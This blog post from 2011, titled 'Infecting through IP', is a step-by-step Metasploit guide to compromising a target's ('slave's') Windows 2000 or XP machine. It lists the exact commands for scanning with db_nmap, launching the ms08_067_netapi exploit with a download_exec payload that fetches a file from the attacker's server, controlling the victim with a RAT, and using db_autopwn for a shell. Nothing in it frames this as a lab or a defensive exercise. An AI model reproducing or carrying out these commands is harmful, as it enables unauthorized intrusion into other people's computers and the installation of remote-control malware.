Search This Blog

Friday, July 22, 2011

Infecting through IP




Requirements:
 

Nmap
Metasploit


First of all you need target ip of your slave.



Then open Metasploit Console & type db_create.
[Use: Thisā€™ll create or connect you to database.]



Once you do that type Nmap.
[Use: Thisā€™ll load Nmap in Metasploit Console]



Next you need to type db_nmap -sT -sV

[Thisā€™ll scan OS, Ports, and Services running on slav...eā€™s computer.]

Wait for 5 minā€™s to complete its scan.
Once done, Note down the OS, Ports, and Services running on slaveā€™s computer.



Now itā€™s time to exploit slaveā€™s machine.

Exploit depends on the OS, Ports, and Services running on slaveā€™s computer.

So, youā€™re lucky if you get OS WIN XP or 2000 because itā€™s easy to exploit them.

No matter weather theyā€™re protected by any firewall or not.



Now Iā€™ll tell you exploiting:-



Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)



Type show exploits
[Use: Thisā€™ll show all the exploits in its database.]



Next you need to type use windows/smb/ms08_067_netapi
[Use: Thisā€™ll select the exploit windows/smb/ms08_067_netapi]



Now Type show targets
[Use: Thisā€™ll show all targets by exploit]



Now Type set target 0

[Use: Thisā€™ll set target to 0 specified]

Then type show payloads

[Use: Thisā€™ll bring up all the payloads]

Next type set payload windows/download_exec

[Use: Thisā€™ll set payload as windows/download_exec]



Then Type show options

[Use: Thisā€™ll show all options in the exploit & payload]

In window youā€™ll see many options, in which you need to
Fill only two options RHOST & URL.



Type set RHOST
[Use: Thisā€™ll set RHOST (slaveā€™s ip) to xxx.xxx.xxx.xxx]



Next Type set URL [content suppressed]
[Use: Thisā€™ll set URL to your direct server link.]



At last you need to type exploit
[Use: This will launch your exploit & your slave will be infected.]



You can now control you're slave with RAT.

So, any versions of Win 2000-XP can be exploited easily.

In case if you didnā€™t get this two OSā€™, immediately after Nmap scan

You can use the command db_autopwn ā€“p ā€“t ā€“e.
In most cases you get a shell.


Good Luck!

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

0 comments:

Post a Comment